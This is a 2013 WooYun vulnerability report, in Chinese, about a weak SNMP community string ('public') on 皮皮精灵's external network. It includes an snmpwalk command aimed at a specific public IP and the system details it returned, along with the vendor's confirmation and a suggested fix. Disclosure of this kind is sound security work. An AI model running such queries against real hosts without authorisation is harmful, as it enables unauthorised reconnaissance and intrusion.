漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-027198
漏洞标题:皮皮精灵某网段存在snmpd弱口令(可获取敏感信息)
相关厂商:皮皮精灵
漏洞作者: winsyk
提交时间:2013-06-30 13:25
修复时间:2013-08-14 13:26
公开时间:2013-08-14 13:26
漏洞类型:基础设施弱口令
危害等级:中
自评Rank:9
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-06-30: 细节已通知厂商并且等待厂商处理中
2013-07-01: 厂商已经确认,细节仅向厂商公开
2013-07-11: 细节向核心白帽子及相关领域专家公开
2013-07-21: 细节向普通白帽子公开
2013-07-31: 细节向实习白帽子公开
2013-08-14: 细节向公众公开
简要描述:
看大家都那么关注皮皮精灵,大家都在看网络应用,那我来看看外网安全吧,球礼物。
详细说明:
皮皮精灵的外网网段规划的不好,端口对外开放比较严重。。
漏洞证明:
snmpwalk -v 2c 114.112.65.28 -c "public" 可获取到的敏感信息如下。
SNMPv2-MIB::sysDescr.0 = STRING: Linux cacti.pp.cc 2.6.32-220.el6.i686 #1 SMP Tue Dec 6 16:15:40 GMT 2011 i686
SNMPv2-MIB::sysObjectID.0 = OID: NET-SNMP-MIB::netSnmpAgentOIDs.10
DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (2253684889) 260 days, 20:14:08.89
SNMPv2-MIB::sysContact.0 = STRING: Root <root@localhost> (configure /etc/snmp/snmp.local.conf)
SNMPv2-MIB::sysName.0 = STRING: cacti.pp.cc
SNMPv2-MIB::sysLocation.0 = STRING: Unknown (edit /etc/snmp/snmpd.conf)
Timeout: No Response from 114.112.65.28
看图吧。
下边一张可获取敏感网段哦。
修复方案:
没啥可说的,鞭打100设置public密码的运维,并且禁止public或者修改强密码。
版权声明:转载请注明来源 winsyk@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2013-07-01 09:11
厂商回复:
运维人员的失误,不知道该说点什么。。
最新状态:
暂无